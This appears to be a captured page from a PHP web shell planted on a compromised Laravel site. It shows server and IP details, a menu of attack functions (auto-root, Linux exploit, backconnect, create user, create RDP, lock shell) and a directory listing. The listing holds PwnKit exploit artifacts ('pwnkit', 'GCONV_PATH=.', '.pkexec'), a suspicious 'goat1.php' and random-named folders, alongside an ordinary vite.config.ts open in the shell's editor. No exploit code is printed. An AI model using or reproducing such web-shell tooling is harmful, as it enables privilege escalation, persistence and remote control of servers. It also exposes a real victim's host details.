Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.19
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo21.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxrwxr-x
bootstrap
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
database
[ DIR ]
drwxrwxr-x
fugabxq
[ DIR ]
drwxr-xr-x
genzwvp
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
jouwbkv
[ DIR ]
drwxr-xr-x
main-file
[ DIR ]
drwxrwxr-x
node_modules
[ DIR ]
drwxrwxr-x
pcwoqek
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxrwxrwx
resources
[ DIR ]
drwxrwxr-x
routes
[ DIR ]
drwxrwxr-x
rzng1fd
[ DIR ]
drwxr-xr-x
snfvkeq
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxr-x
vendor
[ DIR ]
drwxrwxr-x
xiqorbm
[ DIR ]
drwxr-xr-x
zstpryo
[ DIR ]
drwxr-xr-x
.DS_Store
8
KB
-rw-rw-r--
.editorconfig
258
B
-rw-rw-r--
.env
611
B
-rwxrwxrwx
.gitattributes
160
B
-rw-rw-r--
.gitignore
364
B
-rw-rw-r--
.htaccess
479
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
.prettierignore
74
B
-rw-rw-r--
.prettierrc
438
B
-rw-rw-r--
artisan
425
B
-rwxrwxr-x
codecanyon-RWEj9LyP-task-tasks...
184.53
MB
-rw-r--r--
components.json
509
B
-rw-rw-r--
composer.json
3.55
KB
-rw-rw-r--
composer.lock
489.06
KB
-rw-rw-r--
error_log
258
B
-rw-r--r--
eslint.config.js
1.25
KB
-rw-rw-r--
extract-translations.php
2.87
KB
-rw-rw-r--
goat1.php
143.87
KB
-rw-r--r--
index.php
1.18
KB
-rw-r--r--
license-pcae.php
629
B
-rw-r--r--
package-lock.json
461.05
KB
-rw-rw-r--
package.json
3.79
KB
-rw-rw-r--
phpunit.xml
1.15
KB
-rw-rw-r--
pwnkit
10.99
KB
-rwxr-xr-x
robots.txt
86
B
-rw-r--r--
tsconfig.json
12.67
KB
-rw-rw-r--
vite.config.ts
1.88
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vite.config.ts
import tailwindcss from '@tailwindcss/vite'; import laravel from 'laravel-vite-plugin'; import { resolve } from 'node:path'; import { defineConfig } from 'vite'; function stripUseClientDirective(): import('vite').Plugin { return { name: 'strip-use-client-directive', enforce: 'pre' as const, transform(code, id) { if ( id.endsWith('.js') || id.endsWith('.ts') || id.endsWith('.tsx') || id.endsWith('.mjs') ) { if (code.includes('"use client"') || code.includes("'use client'")) { return code.replace(/['"]use client['"];?\s*/g, ''); } } }, }; } export default defineConfig({ base: './', plugins: [ laravel({ input: ['resources/css/app.css', 'resources/css/dark-mode.css', 'resources/js/app.tsx'], ssr: 'resources/js/ssr.tsx', refresh: true, }), stripUseClientDirective(), tailwindcss(), ], server: { host: 'localhost', headers: { 'Access-Control-Allow-Origin': '*', 'Access-Control-Allow-Methods': 'GET,POST,PUT,DELETE,OPTIONS', 'Access-Control-Allow-Headers': '*', }, watch: { ignored: ['**/vendor/**', '**/node_modules/**'] }, fs: { allow: ['..', 'packages'] } }, esbuild: { jsx: 'automatic', jsxImportSource: 'react', }, resolve: { alias: { 'ziggy-js': resolve(__dirname, 'vendor/tightenco/ziggy'), }, }, build: { rollupOptions: { output: { manualChunks: { vendor: ['react', 'react-dom'], ui: ['@radix-ui/react-dialog', '@radix-ui/react-dropdown-menu'], utils: ['date-fns', 'clsx'] } }, }, assetsDir: 'assets', } });
Close